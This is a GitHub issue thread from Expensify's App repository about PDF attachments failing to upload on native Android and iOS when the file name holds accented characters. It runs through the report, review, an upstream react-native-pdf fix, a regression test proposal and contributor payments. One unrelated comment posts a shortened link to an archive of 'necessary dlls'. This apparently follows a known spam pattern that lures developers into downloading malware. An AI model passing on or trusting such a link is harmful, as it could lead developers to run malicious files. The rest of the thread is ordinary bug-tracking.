### ISSUE TITLE
[HOLD for payment 2024-10-11] [$250] Android/iOS - Attachment error displayed when uploading pdf with grave accent in name

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#49449] opened 2024-09-19 09:37 UTC
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.37.3
**Reproducible in staging?:** Y
**Reproducible in production?:** Y
**Issue reported by:** Applause Internal Team

## Action Performed:
1. Open the app and log in
2. Navigate to any report
3. Tap "+" > Add attachment > Choose file
4. Select a pdf file with a name containing a grave accent `

## Expected Result:
The pdf file is uploaded

## Actual Result:
Unable to upload the pdf, the attachment error is displayed

## Workaround:
Unknown

## Platforms:

- [x] Android: Native
- [ ] Android: mWeb Chrome
- [x] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

[Ragù alla bolognese - updated recipe_20 April 2023.pdf](https://github.com/user-attachments/files/17056994/Ragu.alla.bolognese.-.updated.recipe_20.April.2023.pdf)

https://github.com/user-attachments/assets/fe6ceb2b-7e03-4d81-adf6-57e4a5acb608

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~021838993266760256220</li>
        <li>Upwork Job ID: 1838993266760256220</li>
        <li>Last Price Increase: 2024-09-25</li>
<li>Automatic offers: </li>
<ul>
<li>jjcoffee | Reviewer | 104216292</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @JmillsExpensify</details>

**Comment by IuliiaHerets** [comment] 2024-09-19 09:37
@JmillsExpensify  FYI I haven't added the External label as I wasn't 100% sure about this issue. Please take a look and add the label if you agree it's a bug and can be handled by external contributors

**Comment by Buqra55** [comment] 2024-09-19 11:25
maybe this will help
https://bit.ly/3TyLBMS
I put the necessary dlls in the archive

**Comment by JmillsExpensify** [comment] 2024-09-25 17:25
Opening up to the community. Pending proposal review.

**Comment by mahaidery** [comment] 2024-09-25 20:45
Contributor details:
Your Expensify account email: mahaidery@gmail.com
Upwork Profile Link: https://www.upwork.com/freelancers/~01232d5f52fda26a6c

**Comment by jjcoffee** [comment] 2024-09-26 09:52
@bernhardoj's [proposal](https://github.com/Expensify/App/issues/49449#issuecomment-2371606659) LGTM! I'm not 100% sure what we'd do here in terms of patching vs upstream fix, but I'd think since this is a fairly simple change we can patch it now but also open a PR upstream and try to get that merged simultaneously?

:ribbon::eyes::ribbon: C+ reviewed

**Comment by neil-marcellini** [comment] 2024-10-01 16:36
> @bernhardoj's [proposal](https://github.com/Expensify/App/issues/49449#issuecomment-2371606659) LGTM! I'm not 100% sure what we'd do here in terms of patching vs upstream fix, but I'd think since this is a fairly simple change we can patch it now but also open a PR upstream and try to get that merged simultaneously?
> 
> 🎀👀🎀 C+ reviewed

I agree, hiring

**Comment by bernhardoj** [comment] 2024-10-02 09:11
@jjcoffee PR is ready

Upstream PR: https://github.com/wonday/react-native-pdf/pull/873

**Comment by jjcoffee** [comment] 2024-10-14 07:57
- The PR that introduced the bug has been identified. Link to the PR: N/A - always existed in `react-native-pdf`
- The offending PR has been commented on, pointing out the bug it caused and why, so the author and reviewers can learn from the mistake. Link to comment: N/A
- A discussion in #expensify-bugs has been started about whether any other steps should be taken (e.g. updating the PR review checklist) in order to catch this type of bug sooner. Link to discussion: N/A
- Determine if we should create a regression test for this bug. **Yes**
- If we decide to create a [regression test](https://github.com/Expensify/App/blob/main/contributingGuides/REGRESSION_TEST_BEST_PRACTICES.md) for the bug, please propose the regression test steps to ensure the same bug will not reach production again.

**Regression Test Proposal**

1. In any chat add a PDF attachment with accented characters in the filename, e.g. `Ragù.alla.bolognese.-.updated.recipe_20.April.2023.pdf`
2. Verify the PDF loads correctly

Do we agree 👍 or 👎

**Comment by JmillsExpensify** [comment] 2024-10-16 18:03
Payment summary:

 - Contributor: $250 to @bernhardoj via NewDot
 - Reviewer: $250 to @jjcoffee via Upwork

**Comment by JmillsExpensify** [comment] 2024-10-16 18:04
Closing this one out!

**Closed by JmillsExpensify** 2024-10-16 18:04 UTC
Labels: External, Daily, Awaiting Payment, Bug

**Comment by bernhardoj** [comment] 2024-10-17 06:24
Requested in ND.

**Comment by JmillsExpensify** [comment] 2024-10-21 11:09
$250 approved for @bernhardoj

**Comment by trjExpensify** [comment] 2024-10-21 11:10
Confirming the payment summary [here](https://github.com/Expensify/App/issues/49449#issuecomment-2417541991) is correct.

**Comment by JmillsExpensify** [comment] 2024-10-21 11:12
$250 approved for @bernhardoj
